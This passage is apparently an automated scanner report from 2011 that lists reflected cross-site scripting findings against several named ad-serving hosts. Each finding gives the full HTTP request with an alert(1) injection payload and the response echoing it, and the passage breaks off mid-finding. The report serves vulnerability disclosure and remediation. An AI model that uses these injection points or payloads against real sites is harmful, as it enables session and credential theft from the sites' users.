Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://a.collective-media.net/adj/cm.guardian/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5693a'-alert(1)-'88333851b7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.guardian5693a'-alert(1)-'88333851b7a/;sz=728x90;ord=$random$? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Sun, 02 Oct 2011 23:51:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Tue, 01-Nov-2011 23:51:12 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.guardian5693a'-alert(1)-'88333851b7a/;sz=728x90;net=cm;ord=$random$;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.2. http://a.collective-media.net/adj/cm.guardian/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddccb'-alert(1)-'fb58dd8594f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.guardian/;sz=728x90;ord=$random$?&ddccb'-alert(1)-'fb58dd8594f=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Sun, 02 Oct 2011 23:51:10 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Tue, 01-Nov-2011 23:51:10 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.guardian/;sz=728x90;net=cm;ord=$random$?&ddccb'-alert(1)-'fb58dd8594f=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.3. http://a.collective-media.net/adj/cm.guardian/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 660ee'-alert(1)-'ae4a32c4786 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.guardian/;sz=728x90;ord=$random$?660ee'-alert(1)-'ae4a32c4786 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Sun, 02 Oct 2011 23:51:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E3184c20852dc099873bc3845; domain=collective-media.net; path=/; expires=Tue, 01-Nov-2011 23:51:08 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.guardian/;sz=728x90;net=cm;ord=$random$?660ee'-alert(1)-'ae4a32c4786;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.4. http://a.collective-media.net/cmadj/cm.guardian/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.guardian/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a54d'-alert(1)-'bfe528f9315 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.guardian4a54d'-alert(1)-'bfe528f9315/;sz=300x250;net=cm;ord=$random$;env=ifr;ord1=63589;cmpgurl=http%253A//www.guardian.co.uk/football/manchester-united? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:51:21 GMT
Content-Length: 8208
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='122eace26f8db51';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-30314387801_1317599481","http://ib.adnxs.com/ptj?member=311&inv_code=cm.guardian4a54d'-alert(1)-'bfe528f9315&size=300x250&imp_id=cm-30314387801_1317599481,122eace26f8db51&referrer=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2Fmanchester-united&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.guardian4a54d%27-
...[SNIP]...

4.5. http://a.collective-media.net/cmadj/cm.guardian/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://a.collective-media.net
Path:   /cmadj/cm.guardian/

Issue detail

The value of the sz request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 264f9(a)bbc3f94df69 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.guardian/;sz=264f9(a)bbc3f94df69 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:51:16 GMT
Content-Length: 8074
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='122eace26f8db51';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
</scr'+'ipt>');var bap_rnd = Math.floor(Math.random()*100000);
var _bao = {
coid:44,
nid:546,
ad_h:,
ad_w:264f9(a)bbc3f94df69,
uqid:bap_rnd,
cps:''
};
document.write('<img style="margin:0;padding:0;" border="0" width="0" height="0" src="http://c.betrad.com/a/4.gif" id="bap-pixel-'+bap_rnd+'"/>
...[SNIP]...

4.6. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.technoratimedia.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c0a1"-alert(1)-"c16fe58ffb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?pfm=1&tlfs=ch&tmen=ch&tphv=ch&rtg=ga&brw=cr3&os=wn7&prm=0&efo=0&atf=1&uatRandNo=65268&ad_type=ad&section=1782250&ad_size=300x250&9c0a1"-alert(1)-"c16fe58ffb9=1 HTTP/1.1
Host: ad.technoratimedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:54:01 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:54:01 GMT
Pragma: no-cache
Content-Length: 4413
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.technoratimedia.com/imp?9c0a1"-alert(1)-"c16fe58ffb9=1&Z=300x250&atf=1&brw=cr3&efo=0&os=wn7&pfm=1&prm=0&rtg=ga&s=1782250&tlfs=ch&tmen=ch&tphv=ch&uatRandNo=65268&_salt=339107265";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';i
...[SNIP]...

4.7. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec07e"><script>alert(1)</script>3f7f80201f0 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=ec07e"><script>alert(1)</script>3f7f80201f0&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26071&s=26072
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C1002%7C4%7C5%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; rv=1; uid=2944787775510337379

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:12:52 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&rnd=3497789830921369198&fpid=ec07e"><script>alert(1)</script>3f7f80201f0&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.8. http://ad.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99f88"><script>alert(1)</script>8138f9b958e was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1&sp=99f88"><script>alert(1)</script>8138f9b958e HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26071&s=26072
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C1002%7C4%7C5%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; rv=1; uid=2944787775510337379

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:12:52 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&rnd=9036514181597041788&fpid=1&nu=n&t=&sp=99f88"><script>alert(1)</script>8138f9b958e&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.9. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e961"-alert(1)-"cb5fec4d025 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=468x60&section=2398370&8e961"-alert(1)-"cb5fec4d025=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:49:07 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:49:07 GMT
Pragma: no-cache
Content-Length: 4324
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?8e961"-alert(1)-"cb5fec4d025=1&Z=468x60&s=2398370&_salt=2593956440";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar
...[SNIP]...

4.10. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd43b"><script>alert(1)</script>36334559423 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=2126909&dd43b"><script>alert(1)</script>36334559423=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:54:42 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:54:42 GMT
Pragma: no-cache
Content-Length: 4721
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=728x90&dd43b"><script>alert(1)</script>36334559423=1&s=2126909&_salt=328484640&t=2" target="_parent">
...[SNIP]...

4.11. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bd3c"-alert(1)-"451a8231aa5 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=3bd3c"-alert(1)-"451a8231aa5 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19701

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599365384;key=key1+key2+key3+key4;nodecode=yes;link=3bd3c"-alert(1)-"451a8231aa5") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|9
...[SNIP]...

4.12. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 116c3'-alert(1)-'ce519b8c547 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=116c3'-alert(1)-'ce519b8c547 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19701

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
!="")
{    AT_COUNT=''
if ('2046906'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599367009;key=key1+key2+key3+key4;nodecode=yes;link=116c3'-alert(1)-'ce519b8c547')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE2046906+"'))";
AT_TARGET2046906="_self";
}
window.AT_ClickFn2046906= function (click)
{    click=(isN
...[SNIP]...

4.13. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

Issue detail

